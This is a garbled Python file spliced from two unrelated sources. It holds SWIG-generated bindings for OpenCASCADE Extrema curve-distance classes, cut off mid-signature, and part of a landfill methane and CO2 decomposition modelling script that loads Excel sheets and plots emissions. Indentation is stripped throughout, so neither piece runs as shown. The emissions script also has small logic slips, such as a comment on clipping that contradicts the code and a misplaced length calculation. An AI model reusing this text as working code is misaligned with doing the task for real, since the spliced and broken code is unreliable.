class Extrema_LocEPCOfLocateExtPC2d(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:rtype: None
:param P:
:type P: gp_Pnt2d
:param C:
:type C: Adaptor2d_Curve2d &
:param U0:
:type U0: float
:param TolU:
:type TolU: float
:rtype: None
:param P:
:type P: gp_Pnt2d
:param C:
:type C: Adaptor2d_Curve2d &
:param U0:
:type U0: float
:param Umin:
:type Umin: float
:param Usup:
:type Usup: float
:param TolU:
:type TolU: float
:rtype: None
"""
_Extrema.Extrema_LocEPCOfLocateExtPC2d_swiginit(self,_Extrema.new_Extrema_LocEPCOfLocateExtPC2d(*args))
def Initialize(self, *args):
"""
:param C:
:type C: Adaptor2d_Curve2d &
:param Umin:
:type Umin: float
:param Usup:
:type Usup: float
:param TolU:
:type TolU: float
:rtype: None
"""
return _Extrema.Extrema_LocEPCOfLocateExtPC2d_Initialize(self, *args)
def Perform(self, *args):
"""
:param P:
:type P: gp_Pnt2d
:param U0:
:type U0: float
:rtype: None
"""
return _Extrema.Extrema_LocEPCOfLocateExtPC2d_Perform(self, *args)
def IsDone(self, *args):
"""
:rtype: bool
"""
return _Extrema.Extrema_LocEPCOfLocateExtPC2d_IsDone(self, *args)
def SquareDistance(self, *args):
"""
:rtype: float
"""
return _Extrema.Extrema_LocEPCOfLocateExtPC2d_SquareDistance(self, *args)
def IsMin(self, *args):
"""
:rtype: bool
"""
return _Extrema.Extrema_LocEPCOfLocateExtPC2d_IsMin(self, *args)
def Point(self, *args):
"""
:rtype: Extrema_POnCurv2d
"""
return _Extrema.Extrema_LocEPCOfLocateExtPC2d_Point(self, *args)
__swig_destroy__ = _Extrema.delete_Extrema_LocEPCOfLocateExtPC2d
Extrema_LocEPCOfLocateExtPC2d.Initialize = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC2d_Initialize,None,Extrema_LocEPCOfLocateExtPC2d)
Extrema_LocEPCOfLocateExtPC2d.Perform = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC2d_Perform,None,Extrema_LocEPCOfLocateExtPC2d)
Extrema_LocEPCOfLocateExtPC2d.IsDone = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC2d_IsDone,None,Extrema_LocEPCOfLocateExtPC2d)
Extrema_LocEPCOfLocateExtPC2d.SquareDistance = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC2d_SquareDistance,None,Extrema_LocEPCOfLocateExtPC2d)
Extrema_LocEPCOfLocateExtPC2d.IsMin = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC2d_IsMin,None,Extrema_LocEPCOfLocateExtPC2d)
Extrema_LocEPCOfLocateExtPC2d.Point = new_instancemethod(_Extrema.Extrema_LocEPCOfLocateExtPC2d_Point,None,Extrema_LocEPCOfLocateExtPC2d)
Extrema_LocEPCOfLocateExtPC2d_swigregister = _Extrema.Extrema_LocEPCOfLocateExtPC2d_swigregister
Extrema_LocEPCOfLocateExtPC2d_swigregister(Extrema_LocEPCOfLocateExtPC2d)
class Extrema_LocateExtCC(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:param C1:
:type C1: Adaptor3d_Curve &
:param C2:
:type C2: Adaptor3d_Curve &
:param U0:
:type U0: float
:param V0:
:type V0: float
:rtype: None
"""
_Extrema.Extrema_LocateExtCC_swiginit(self,_Extrema.new_Extrema_LocateExtCC(*args))
def IsDone(self, *args):
"""
:rtype: bool
"""
return _Extrema.Extrema_LocateExtCC_IsDone(self, *args)
def SquareDistance(self, *args):
"""
:rtype: float
"""
return _Extrema.Extrema_LocateExtCC_SquareDistance(self, *args)
def Point(self, *args):
"""
:param P1:
:type P1: Extrema_POnCurv &
:param P2:
:type P2: Extrema_POnCurv &
:rtype: None
"""
return _Extrema.Extrema_LocateExtCC_Point(self, *args)
__swig_destroy__ = _Extrema.delete_Extrema_LocateExtCC
Extrema_LocateExtCC.IsDone = new_instancemethod(_Extrema.Extrema_LocateExtCC_IsDone,None,Extrema_LocateExtCC)
Extrema_LocateExtCC.SquareDistance = new_instancemethod(_Extrema.Extrema_LocateExtCC_SquareDistance,None,Extrema_LocateExtCC)
Extrema_LocateExtCC.Point = new_instancemethod(_Extrema.Extrema_LocateExtCC_Point,None,Extrema_LocateExtCC)
Extrema_LocateExtCC_swigregister = _Extrema.Extrema_LocateExtCC_swigregister
Extrema_LocateExtCC_swigregister(Extrema_LocateExtCC)
class Extrema_LocateExtCC2d(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:param C1:
:type C1: Adaptor2d_Curve2d &
:param C2:
:type C2: Adaptor2d_Curve2d &
:param U0:
:type U0: float
:param V0:
:type V0: float
:rtype: None
"""
_Extrema.Extrema_LocateExtCC2d_swiginit(self,_Extrema.new_Extrema_LocateExtCC2d(*args))
def IsDone(self, *args):
"""
:rtype: bool
"""
return _Extrema.Extrema_LocateExtCC2d_IsDone(self, *args)
def SquareDistance(self, *args):
"""
:rtype: float
"""
return _Extrema.Extrema_LocateExtCC2d_SquareDistance(self, *args)
def Point(self, *args):
"""
:param P1:
:type P1: Extrema_POnCurv2d &
:param P2:
:type P2: Extrema_POnCurv2d &
:rtype: None
"""
return _Extrema.Extrema_LocateExtCC2d_Point(self, *args)
__swig_destroy__ = _Extrema.delete_Extrema_LocateExtCC2d
Extrema_LocateExtCC2d.IsDone = new_instancemethod(_Extrema.Extrema_LocateExtCC2d_IsDone,None,Extrema_LocateExtCC2d)
Extrema_LocateExtCC2d.SquareDistance = new_instancemethod(_Extrema.Extrema_LocateExtCC2d_SquareDistance,None,Extrema_LocateExtCC2d)
Extrema_LocateExtCC2d.Point = new_instancemethod(_Extrema.Extrema_LocateExtCC2d_Point,None,Extrema_LocateExtCC2d)
Extrema_LocateExtCC2d_swigregister = _Extrema.Extrema_LocateExtCC2d_swigregister
Extrema_LocateExtCC2d_swigregister(Extrema_LocateExtCC2d)
class Extrema_LocateExtPC(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:rtype: None
:param P:
:type P: gp_Pnt
:param C:
:type C: Adaptor3d_Curve &
:param U0:
:type U0: float
:param TolF:
:type TolF: float
:rtype: None
:param P:
:type P: gp_Pnt
:param C:
:type C: Adaptor3d_Curve &
:param U0:
:type U0: float
:param Umin:
:type Umin: float
:param Usup:
:type Usup: float
:param TolF:
:type TolF: float
:rtype: None
"""
_Extrema.Extrema_LocateExtPC_swiginit(self,_Extrema.new_Extrema_LocateExtPC(*args))
def Initialize(self, *args):
"""
:param C:
:type C: Adaptor3d_Curve &
:param Umin:
:type Umin: float
:param Usup:
:type Usup: float
:param TolF:
:type TolF: float
:rtype: None
"""
return _Extrema.Extrema_LocateExtPC_Initialize(self, *args)
def Perform(self, *args):
"""
:param P:
:type P: gp_Pnt
:param U0:
:type U0: float
:rtype: None
"""
return _Extrema.Extrema_LocateExtPC_Perform(self, *args)
def IsDone(self, *args):
"""
:rtype: bool
"""
return _Extrema.Extrema_LocateExtPC_IsDone(self, *args)
def SquareDistance(self, *args):
"""
:rtype: float
"""
return _Extrema.Extrema_LocateExtPC_SquareDistance(self, *args)
def IsMin(self, *args):
"""
:rtype: bool
"""
return _Extrema.Extrema_LocateExtPC_IsMin(self, *args)
def Point(self, *args):
"""
:rtype: Extrema_POnCurv
"""
return _Extrema.Extrema_LocateExtPC_Point(self, *args)
__swig_destroy__ = _Extrema.delete_Extrema_LocateExtPC
Extrema_LocateExtPC.Initialize = new_instancemethod(_Extrema.Extrema_LocateExtPC_Initialize,None,Extrema_LocateExtPC)
Extrema_LocateExtPC.Perform = new_instancemethod(_Extrema.Extrema_LocateExtPC_Perform,None,Extrema_LocateExtPC)
Extrema_LocateExtPC.IsDone = new_instancemethod(_Extrema.Extrema_LocateExtPC_IsDone,None,Extrema_LocateExtPC)
Extrema_LocateExtPC.SquareDistance = new_instancemethod(_Extrema.Extrema_LocateExtPC_SquareDistance,None,Extrema_LocateExtPC)
Extrema_LocateExtPC.IsMin = new_instancemethod(_Extrema.Extrema_LocateExtPC_IsMin,None,Extrema_LocateExtPC)
Extrema_LocateExtPC.Point = new_instancemethod(_Extrema.Extrema_LocateExtPC_Point,None,Extrema_LocateExtPC)
Extrema_LocateExtPC_swigregister = _Extrema.Extrema_LocateExtPC_swigregister
Extrema_LocateExtPC_swigregister(Extrema_LocateExtPC)
class Extrema_LocateExtPC2d(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:rtype: None
:param P:
:type P: gp_Pnt2d
:param C:
:type C: Adaptor2d_Curve2d &
:param U0:
:type U0: float
:param TolF:
:type TolF: float
:rtype: None
:param P:
:type P: gp_Pnt2d
:param C:
:type C: Adaptor2d_Curve2d &
:param U0:
:type U0: float
:param Umin:
:type Umin: float
:param Usup:
:type Usup: float
:param TolF:
:type TolF: float
:rtype: None
"""
_Extrema.Extrema_LocateExtPC2d_swiginit(self,_Extrema.new_Extrema_LocateExtPC2d(*args))
def Initialize(self, *args):
"""
:param C:
:type C: Adaptor2d_Curve2d &
:param Umin:
:type Umin: float
:param Usup:
:type Usup: float
:param TolF:
:type TolF: float
:rtype: None
"""
return _Extrema.Extrema_LocateExtPC2d_Initialize(self, *args)
def Perform(self, *args):
"""
:param P:
:type P: gp_Pnt2d
:param U0:
:type U0: float
:rtype: None
"""
return _Extrema.Extrema_LocateExtPC2d_Perform(self, *args)
def IsDone(self, *args):
"""
:rtype: bool
"""
return _Extrema.Extrema_LocateExtPC2d_IsDone(self, *args)
def SquareDistance(self, *args):
"""
:rtype: float
"""
return _Extrema.Extrema_LocateExtPC2d_SquareDistance(self, *args)
def IsMin(self, *args):
"""
:rtype: bool
"""
return _Extrema.Extrema_LocateExtPC2d_IsMin(self, *args)
def Point(self, *args):
"""
:rtype: Extrema_POnCurv2d
"""
return _Extrema.Extrema_LocateExtPC2d_Point(self, *args)
__swig_destroy__ = _Extrema.delete_Extrema_LocateExtPC2d
Extrema_LocateExtPC2d.Initialize = new_instancemethod(_Extrema.Extrema_LocateExtPC2d_Initialize,None,Extrema_LocateExtPC2d)
Extrema_LocateExtPC2d.Perform = new_instancemethod(_Extrema.Extrema_LocateExtPC2d_Perform,None,Extrema_LocateExtPC2d)
Extrema_LocateExtPC2d.IsDone = new_instancemethod(_Extrema.Extrema_LocateExtPC2d_IsDone,None,Extrema_LocateExtPC2d)
Extrema_LocateExtPC2d.SquareDistance = new_instancemethod(_Extrema.Extrema_LocateExtPC2d_SquareDistance,None,Extrema_LocateExtPC2d)
Extrema_LocateExtPC2d.IsMin = new_instancemethod(_Extrema.Extrema_LocateExtPC2d_IsMin,None,Extrema_LocateExtPC2d)
Extrema_LocateExtPC2d.Point = new_instancemethod(_Extrema.Extrema_LocateExtPC2d_Point,None,Extrema_LocateExtPC2d)
Extrema_LocateExtPC2d_swigregister = _Extrema.Extrema_LocateExtPC2d_swigregister
Extrema_LocateExtPC2d_swigregister(Extrema_LocateExtPC2d)
class Extrema_PCFOfEPCOfELPCOfLocateExtPC(object):
thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag')
__repr__ = _swig_repr
def __init__(self, *args):
"""
:rtype: None
:param P:
:type P: gp_Pnt
:param C:
:type C: Adaptor3d_Curve &
:rtype: None
"""
_Extrema.Extrema_PCFOfEPCOfELPCOfLocateExtPC_swiginit(self,_Extrema.new_Extrema_PCFOfEPCOfELPCOfLocateExtPC(*args))
def Initialize(self, *args):
"""
:param C:
:type C: Adaptor3d_Curve &
:rtype: None
"""
return _Extrema.Extrema_PCFOfEPCOfELPCOfLocateExtPC_Initialize(self, *args)
def SetPoint(self, | |
of the year (esp. from 'year 1' onward),
#we have to replace the positive numbers with 0 values (https://stackoverflow.com/questions/36310897/how-do-i-change-all-negative-numbers-to-zero-in-python/36310913)
subs_matrix_CH4_S1_Tgr_60y = subs_matrix_CH4_S1_Tgr_60y.clip(max=0)
print(subs_matrix_CH4_S1_Tgr_60y[:,:4])
#make the results as absolute values
subs_matrix_CH4_S1_Tgr_60y = abs(subs_matrix_CH4_S1_Tgr_60y)
print(subs_matrix_CH4_S1_Tgr_60y[:,:4])
#insert row of zeros into the first row of the subs_matrix
zero_matrix_CH4_S1_Tgr_60y = np.zeros((len(t)-200,len(df['Landfill_decomp_CH4'].values)))
print(zero_matrix_CH4_S1_Tgr_60y)
subs_matrix_CH4_S1_Tgr_60y = np.vstack((zero_matrix_CH4_S1_Tgr_60y, subs_matrix_CH4_S1_Tgr_60y))
print(subs_matrix_CH4_S1_Tgr_60y[:,:4])
#sum every column of the subs_matrix into one vector matrix
matrix_tot_CH4_S1_Tgr_60y = (tf,1)
decomp_tot_CH4_S1_Tgr_60y = np.zeros(matrix_tot_CH4_S1_Tgr_60y)
i = 0
while i < tf:
decomp_tot_CH4_S1_Tgr_60y[:,0] = decomp_tot_CH4_S1_Tgr_60y[:,0] + subs_matrix_CH4_S1_Tgr_60y[:,i]
i = i + 1
print(decomp_tot_CH4_S1_Tgr_60y[:,0])
#E
df = pd.read_excel('C:\\Work\\Programming\\Practice\\DL_FP.xlsx', 'DL_FP_E_Hbr_40y')
tf = 201
t = np.arange(tf)
def decomp_CH4_E_Hbr_40y(t,remainAGB_CH4_E_Hbr_40y):
return (1-(1-np.exp(-k*t)))*remainAGB_CH4_E_Hbr_40y
#set zero matrix
output_decomp_CH4_E_Hbr_40y = np.zeros((len(t),len(df['Landfill_decomp_CH4'].values)))
for i,remain_part_CH4_E_Hbr_40y in enumerate(df['Landfill_decomp_CH4'].values):
#print(i,remain_part)
output_decomp_CH4_E_Hbr_40y[i:,i] = decomp_CH4_E_Hbr_40y(t[:len(t)-i],remain_part_CH4_E_Hbr_40y)
print(output_decomp_CH4_E_Hbr_40y[:,:4])
#find the yearly emissions from decomposition by calculating the differences between elements in list 'decomp_tot_S1'
#(https://stackoverflow.com/questions/5314241/difference-between-consecutive-elements-in-list)
# https://stackoverflow.com/questions/11095892/numpy-difference-between-neighboring-elements
#difference between element,
subs_matrix_CH4_E_Hbr_40y = np.zeros((len(t)-1,len(df['Landfill_decomp_CH4'].values-1)))
i = 0
while i < tf:
subs_matrix_CH4_E_Hbr_40y[:,i] = np.diff(output_decomp_CH4_E_Hbr_40y[:,i])
i = i + 1
print(subs_matrix_CH4_E_Hbr_40y[:,:4])
print(len(subs_matrix_CH4_E_Hbr_40y))
#since there is no carbon emission from decomposition at the beginning of the year (esp. from 'year 1' onward),
#we have to replace the positive numbers with 0 values (https://stackoverflow.com/questions/36310897/how-do-i-change-all-negative-numbers-to-zero-in-python/36310913)
subs_matrix_CH4_E_Hbr_40y = subs_matrix_CH4_E_Hbr_40y.clip(max=0)
print(subs_matrix_CH4_E_Hbr_40y[:,:4])
#make the results as absolute values
subs_matrix_CH4_E_Hbr_40y = abs(subs_matrix_CH4_E_Hbr_40y)
print(subs_matrix_CH4_E_Hbr_40y[:,:4])
#insert row of zeros into the first row of the subs_matrix
zero_matrix_CH4_E_Hbr_40y = np.zeros((len(t)-200,len(df['Landfill_decomp_CH4'].values)))
print(zero_matrix_CH4_E_Hbr_40y)
subs_matrix_CH4_E_Hbr_40y = np.vstack((zero_matrix_CH4_E_Hbr_40y, subs_matrix_CH4_E_Hbr_40y))
print(subs_matrix_CH4_E_Hbr_40y[:,:4])
#sum every column of the subs_matrix into one vector matrix
matrix_tot_CH4_E_Hbr_40y = (tf,1)
decomp_tot_CH4_E_Hbr_40y = np.zeros(matrix_tot_CH4_E_Hbr_40y)
i = 0
while i < tf:
decomp_tot_CH4_E_Hbr_40y[:,0] = decomp_tot_CH4_E_Hbr_40y[:,0] + subs_matrix_CH4_E_Hbr_40y[:,i]
i = i + 1
print(decomp_tot_CH4_E_Hbr_40y[:,0])
#plotting
t = np.arange(0,tf)
plt.plot(t,decomp_tot_CH4_S1_Ac_7y,label='Ac_7y')
plt.plot(t,decomp_tot_CH4_S1_Ac_18y,label='Ac_18y')
plt.plot(t,decomp_tot_CH4_S1_Tgr_40y,label='Tgr_40y')
plt.plot(t,decomp_tot_CH4_S1_Tgr_60y,label='Tgr_60y')
plt.plot(t,decomp_tot_CH4_E_Hbr_40y,label='E_Hbr_40y')
plt.xlim(0,200)
plt.legend(bbox_to_anchor=(1.04,1), loc="upper left", frameon=False)
plt.show()
#%%
#Step (7_2): landfill gas decomposition (CO2)
#CO2 decomposition
hl = 20 #half-live
k = (np.log(2))/hl
#S1_Ac_7y
df = pd.read_excel('C:\\Work\\Programming\\Practice\\DL_FP.xlsx', 'DL_FP_S1_Ac_7y')
tf = 201
t = np.arange(tf)
def decomp_S1_Ac_7y(t,remainAGB_S1_Ac_7y):
return (1-(1-np.exp(-k*t)))*remainAGB_S1_Ac_7y
#set zero matrix
output_decomp_S1_Ac_7y = np.zeros((len(t),len(df['Landfill_decomp_CO2'].values)))
for i,remain_part_S1_Ac_7y in enumerate(df['Landfill_decomp_CO2'].values):
#print(i,remain_part)
output_decomp_S1_Ac_7y[i:,i] = decomp_S1_Ac_7y(t[:len(t)-i],remain_part_S1_Ac_7y)
print(output_decomp_S1_Ac_7y[:,:4])
#find the yearly emissions from decomposition by calculating the differences between elements in list 'decomp_tot_S1'
#(https://stackoverflow.com/questions/5314241/difference-between-consecutive-elements-in-list)
# https://stackoverflow.com/questions/11095892/numpy-difference-between-neighboring-elements
#difference between element,
subs_matrix_S1_Ac_7y = np.zeros((len(t)-1,len(df['Landfill_decomp_CO2'].values-1)))
i = 0
while i < tf:
subs_matrix_S1_Ac_7y[:,i] = np.diff(output_decomp_S1_Ac_7y[:,i])
i = i + 1
print(subs_matrix_S1_Ac_7y[:,:4])
print(len(subs_matrix_S1_Ac_7y))
#since there is no carbon emission from decomposition at the beginning of the year (esp. from 'year 1' onward),
#we have to replace the positive numbers with 0 values (https://stackoverflow.com/questions/36310897/how-do-i-change-all-negative-numbers-to-zero-in-python/36310913)
subs_matrix_S1_Ac_7y = subs_matrix_S1_Ac_7y.clip(max=0)
print(subs_matrix_S1_Ac_7y[:,:4])
#make the results as absolute values
subs_matrix_S1_Ac_7y = abs(subs_matrix_S1_Ac_7y)
print(subs_matrix_S1_Ac_7y[:,:4])
#insert row of zeros into the first row of the subs_matrix
zero_matrix_S1_Ac_7y = np.zeros((len(t)-200,len(df['Landfill_decomp_CO2'].values)))
print(zero_matrix_S1_Ac_7y)
subs_matrix_S1_Ac_7y = np.vstack((zero_matrix_S1_Ac_7y, subs_matrix_S1_Ac_7y))
print(subs_matrix_S1_Ac_7y[:,:4])
#sum every column of the subs_matrix into one vector matrix
matrix_tot_S1_Ac_7y = (tf,1)
decomp_tot_CO2_S1_Ac_7y = np.zeros(matrix_tot_S1_Ac_7y)
i = 0
while i < tf:
decomp_tot_CO2_S1_Ac_7y[:,0] = decomp_tot_CO2_S1_Ac_7y[:,0] + subs_matrix_S1_Ac_7y[:,i]
i = i + 1
print(decomp_tot_CO2_S1_Ac_7y[:,0])
#S1_Ac_18y
df = pd.read_excel('C:\\Work\\Programming\\Practice\\DL_FP.xlsx', 'DL_FP_S1_Ac_18y')
tf = 201
t = np.arange(tf)
def decomp_S1_Ac_18y(t,remainAGB_S1_Ac_18y):
return (1-(1-np.exp(-k*t)))*remainAGB_S1_Ac_18y
#set zero matrix
output_decomp_S1_Ac_18y = np.zeros((len(t),len(df['Landfill_decomp_CO2'].values)))
for i,remain_part_S1_Ac_18y in enumerate(df['Landfill_decomp_CO2'].values):
#print(i,remain_part)
output_decomp_S1_Ac_18y[i:,i] = decomp_S1_Ac_18y(t[:len(t)-i],remain_part_S1_Ac_18y)
print(output_decomp_S1_Ac_18y[:,:4])
#find the yearly emissions from decomposition by calculating the differences between elements in list 'decomp_tot_S1'
#(https://stackoverflow.com/questions/5314241/difference-between-consecutive-elements-in-list)
# https://stackoverflow.com/questions/11095892/numpy-difference-between-neighboring-elements
#difference between element,
subs_matrix_S1_Ac_18y = np.zeros((len(t)-1,len(df['Landfill_decomp_CO2'].values-1)))
i = 0
while i < tf:
subs_matrix_S1_Ac_18y[:,i] = np.diff(output_decomp_S1_Ac_18y[:,i])
i = i + 1
print(subs_matrix_S1_Ac_18y[:,:4])
print(len(subs_matrix_S1_Ac_18y))
#since there is no carbon emission from decomposition at the beginning of the year (esp. from 'year 1' onward),
#we have to replace the positive numbers with 0 values (https://stackoverflow.com/questions/36310897/how-do-i-change-all-negative-numbers-to-zero-in-python/36310913)
subs_matrix_S1_Ac_18y = subs_matrix_S1_Ac_18y.clip(max=0)
print(subs_matrix_S1_Ac_18y[:,:4])
#make the results as absolute values
subs_matrix_S1_Ac_18y = abs(subs_matrix_S1_Ac_18y)
print(subs_matrix_S1_Ac_18y[:,:4])
#insert row of zeros into the first row of the subs_matrix
zero_matrix_S1_Ac_18y = np.zeros((len(t)-200,len(df['Landfill_decomp_CO2'].values)))
print(zero_matrix_S1_Ac_18y)
subs_matrix_S1_Ac_18y = np.vstack((zero_matrix_S1_Ac_18y, subs_matrix_S1_Ac_18y))
print(subs_matrix_S1_Ac_18y[:,:4])
#sum every column of the subs_matrix into one vector matrix
matrix_tot_S1_Ac_18y = (tf,1)
decomp_tot_CO2_S1_Ac_18y = np.zeros(matrix_tot_S1_Ac_18y)
i = 0
while i < tf:
decomp_tot_CO2_S1_Ac_18y[:,0] = decomp_tot_CO2_S1_Ac_18y[:,0] + subs_matrix_S1_Ac_18y[:,i]
i = i + 1
print(decomp_tot_CO2_S1_Ac_18y[:,0])
#S1_Tgr_40y
df = pd.read_excel('C:\\Work\\Programming\\Practice\\DL_FP.xlsx', 'DL_FP_S1_Tgr_40y')
tf = 201
t = np.arange(tf)
def decomp_S1_Tgr_40y(t,remainAGB_S1_Tgr_40y):
return (1-(1-np.exp(-k*t)))*remainAGB_S1_Tgr_40y
#set zero matrix
output_decomp_S1_Tgr_40y = np.zeros((len(t),len(df['Landfill_decomp_CO2'].values)))
for i,remain_part_S1_Tgr_40y in enumerate(df['Landfill_decomp_CO2'].values):
#print(i,remain_part)
output_decomp_S1_Tgr_40y[i:,i] = decomp_S1_Tgr_40y(t[:len(t)-i],remain_part_S1_Tgr_40y)
print(output_decomp_S1_Tgr_40y[:,:4])
#find the yearly emissions from decomposition by calculating the differences between elements in list 'decomp_tot_S1'
#(https://stackoverflow.com/questions/5314241/difference-between-consecutive-elements-in-list)
# https://stackoverflow.com/questions/11095892/numpy-difference-between-neighboring-elements
#difference between element,
subs_matrix_S1_Tgr_40y = np.zeros((len(t)-1,len(df['Landfill_decomp_CO2'].values-1)))
i = 0
while i < tf:
subs_matrix_S1_Tgr_40y[:,i] = np.diff(output_decomp_S1_Tgr_40y[:,i])
i = i + 1
print(subs_matrix_S1_Tgr_40y[:,:4])
print(len(subs_matrix_S1_Tgr_40y))
#since there is no carbon emission from decomposition at the beginning of the year (esp. from 'year 1' onward),
#we have to replace the positive numbers with 0 values (https://stackoverflow.com/questions/36310897/how-do-i-change-all-negative-numbers-to-zero-in-python/36310913)
subs_matrix_S1_Tgr_40y = subs_matrix_S1_Tgr_40y.clip(max=0)
print(subs_matrix_S1_Tgr_40y[:,:4])
#make the results as absolute values
subs_matrix_S1_Tgr_40y = abs(subs_matrix_S1_Tgr_40y)
print(subs_matrix_S1_Tgr_40y[:,:4])
#insert row of zeros into the first row of the subs_matrix
zero_matrix_S1_Tgr_40y = np.zeros((len(t)-200,len(df['Landfill_decomp_CO2'].values)))
print(zero_matrix_S1_Tgr_40y)
subs_matrix_S1_Tgr_40y = np.vstack((zero_matrix_S1_Tgr_40y, subs_matrix_S1_Tgr_40y))
print(subs_matrix_S1_Tgr_40y[:,:4])
#sum every column of the subs_matrix into one vector matrix
matrix_tot_S1_Tgr_40y = (tf,1)
decomp_tot_CO2_S1_Tgr_40y = np.zeros(matrix_tot_S1_Tgr_40y)
i = 0
while i < tf:
decomp_tot_CO2_S1_Tgr_40y[:,0] = decomp_tot_CO2_S1_Tgr_40y[:,0] + subs_matrix_S1_Tgr_40y[:,i]
i = i + 1
print(decomp_tot_CO2_S1_Tgr_40y[:,0])
#S2_Tgr_60y
df = pd.read_excel('C:\\Work\\Programming\\Practice\\DL_FP.xlsx', 'DL_FP_S1_Tgr_60y')
tf = 201
t = np.arange(tf)
def decomp_S1_Tgr_60y(t,remainAGB_S1_Tgr_60y):
return (1-(1-np.exp(-k*t)))*remainAGB_S1_Tgr_60y
#set zero matrix
output_decomp_S1_Tgr_60y = np.zeros((len(t),len(df['Landfill_decomp_CO2'].values)))
for i,remain_part_S1_Tgr_60y in enumerate(df['Landfill_decomp_CO2'].values):
#print(i,remain_part)
output_decomp_S1_Tgr_60y[i:,i] = decomp_S1_Tgr_60y(t[:len(t)-i],remain_part_S1_Tgr_60y)
print(output_decomp_S1_Tgr_60y[:,:4])
#find the yearly emissions from decomposition by calculating the differences between elements in list 'decomp_tot_S1'
#(https://stackoverflow.com/questions/5314241/difference-between-consecutive-elements-in-list)
# https://stackoverflow.com/questions/11095892/numpy-difference-between-neighboring-elements
#difference between element,
subs_matrix_S1_Tgr_60y = np.zeros((len(t)-1,len(df['Landfill_decomp_CO2'].values-1)))
i = 0
while i < tf:
subs_matrix_S1_Tgr_60y[:,i] = np.diff(output_decomp_S1_Tgr_60y[:,i])
i = i + 1
print(subs_matrix_S1_Tgr_60y[:,:4])
print(len(subs_matrix_S1_Tgr_60y))
#since there is no carbon emission from decomposition at the beginning of the year (esp. from 'year 1' onward),
#we have to replace the positive numbers with 0 values (https://stackoverflow.com/questions/36310897/how-do-i-change-all-negative-numbers-to-zero-in-python/36310913)
subs_matrix_S1_Tgr_60y = subs_matrix_S1_Tgr_60y.clip(max=0)
print(subs_matrix_S1_Tgr_60y[:,:4])
#make the results as absolute values
subs_matrix_S1_Tgr_60y = abs(subs_matrix_S1_Tgr_60y)
print(subs_matrix_S1_Tgr_60y[:,:4])
#insert row of zeros into the first row of the subs_matrix
zero_matrix_S1_Tgr_60y = np.zeros((len(t)-200,len(df['Landfill_decomp_CO2'].values)))
print(zero_matrix_S1_Tgr_60y)
subs_matrix_S1_Tgr_60y = np.vstack((zero_matrix_S1_Tgr_60y, subs_matrix_S1_Tgr_60y))
print(subs_matrix_S1_Tgr_60y[:,:4])
#sum every column of the subs_matrix into one vector matrix
matrix_tot_S1_Tgr_60y = (tf,1)
decomp_tot_CO2_S1_Tgr_60y = np.zeros(matrix_tot_S1_Tgr_60y)
i = 0
while i < tf:
decomp_tot_CO2_S1_Tgr_60y[:,0] = decomp_tot_CO2_S1_Tgr_60y[:,0] + subs_matrix_S1_Tgr_60y[:,i]
i = i + 1
print(decomp_tot_CO2_S1_Tgr_60y[:,0])
#E
df = pd.read_excel('C:\\Work\\Programming\\Practice\\DL_FP.xlsx', 'DL_FP_E_Hbr_40y')
tf = 201
t = np.arange(tf)
def decomp_E_Hbr_40y(t,remainAGB_E_Hbr_40y):
return (1-(1-np.exp(-k*t)))*remainAGB_E_Hbr_40y
#set zero matrix
output_decomp_E_Hbr_40y = np.zeros((len(t),len(df['Landfill_decomp_CO2'].values)))
for i,remain_part_E_Hbr_40y in enumerate(df['Landfill_decomp_CO2'].values):
#print(i,remain_part)
output_decomp_E_Hbr_40y[i:,i] = decomp_E_Hbr_40y(t[:len(t)-i],remain_part_E_Hbr_40y)
print(output_decomp_E_Hbr_40y[:,:4])
#find the yearly emissions from decomposition by calculating the differences between elements in list 'decomp_tot_S1'
#(https://stackoverflow.com/questions/5314241/difference-between-consecutive-elements-in-list)
# https://stackoverflow.com/questions/11095892/numpy-difference-between-neighboring-elements
#difference between element,
subs_matrix_E_Hbr_40y = np.zeros((len(t)-1,len(df['Landfill_decomp_CO2'].values-1)))
i = 0
while i < tf:
subs_matrix_E_Hbr_40y[:,i] = np.diff(output_decomp_E_Hbr_40y[:,i])
i = i + 1
print(subs_matrix_E_Hbr_40y[:,:4])
print(len(subs_matrix_E_Hbr_40y))
#since there is no carbon emission from decomposition at the beginning of the year (esp. from 'year 1' onward),
#we have to replace the positive numbers with 0 values (https://stackoverflow.com/questions/36310897/how-do-i-change-all-negative-numbers-to-zero-in-python/36310913)
subs_matrix_E_Hbr_40y = subs_matrix_E_Hbr_40y.clip(max=0)
print(subs_matrix_E_Hbr_40y[:,:4])
#make the results as absolute values
subs_matrix_E_Hbr_40y = abs(subs_matrix_E_Hbr_40y)
print(subs_matrix_E_Hbr_40y[:,:4])
#insert row of zeros into the first row of the subs_matrix
zero_matrix_E_Hbr_40y = np.zeros((len(t)-200,len(df['Landfill_decomp_CO2'].values)))
print(zero_matrix_E_Hbr_40y)
subs_matrix_E_Hbr_40y = np.vstack((zero_matrix_E_Hbr_40y, subs_matrix_E_Hbr_40y))
print(subs_matrix_E_Hbr_40y[:,:4])
#sum every column of the subs_matrix into one vector matrix
matrix_tot_E_Hbr_40y = (tf,1)
decomp_tot_CO2_E_Hbr_40y = np.zeros(matrix_tot_E_Hbr_40y)
i = 0
while i < tf:
decomp_tot_CO2_E_Hbr_40y[:,0] = decomp_tot_CO2_E_Hbr_40y[:,0] + subs_matrix_E_Hbr_40y[:,i]
i = i + 1
print(decomp_tot_CO2_E_Hbr_40y[:,0])
#plotting
t = np.arange(0,tf)
plt.plot(t,decomp_tot_CO2_S1_Ac_7y,label='Ac_7y')
plt.plot(t,decomp_tot_CO2_S1_Ac_18y,label='Ac_18y')
